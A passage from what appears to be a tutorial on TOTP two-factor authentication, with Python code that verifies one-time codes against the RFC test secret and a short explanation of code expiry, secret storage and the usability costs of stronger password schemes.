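def verify_totp(secret, code, for_time=None, step=30, digits=6, skew=1):
    """Server-side check: accept the current interval and `skew` intervals on
    either side to tolerate clock drift, comparing in constant time."""
    if for_time is None:
        for_time = time.time()
    counter = int(for_time) // step
    return any(
        hmac.compare_digest(hotp(secret, counter + d, digits), code)
        for d in range(-skew, skew + 1)
    )


# Shared secret from the RFC 4226/6238 test vectors (ASCII "12345678901234567890").
# A real enrollment uses a random secret, usually carried to the app as a
# base32 string inside the QR code.
RFC_TEST_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    print("current 6-digit code:", totp(RFC_TEST_SECRET))
```

Two properties follow directly from the code: a captured code is worthless after at most (2 * skew + 1) intervals, and the whole scheme rests on the secrecy of the shared secret, so the server must store it as carefully as a password hash would be stored (it cannot be hashed, because the server needs the plaintext to compute the same HMAC).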
The disadvantages are that it's more complex and often requires outside systems to function. So while the future of password security is moving towards being more secure, it's not necessarily more user-friendly.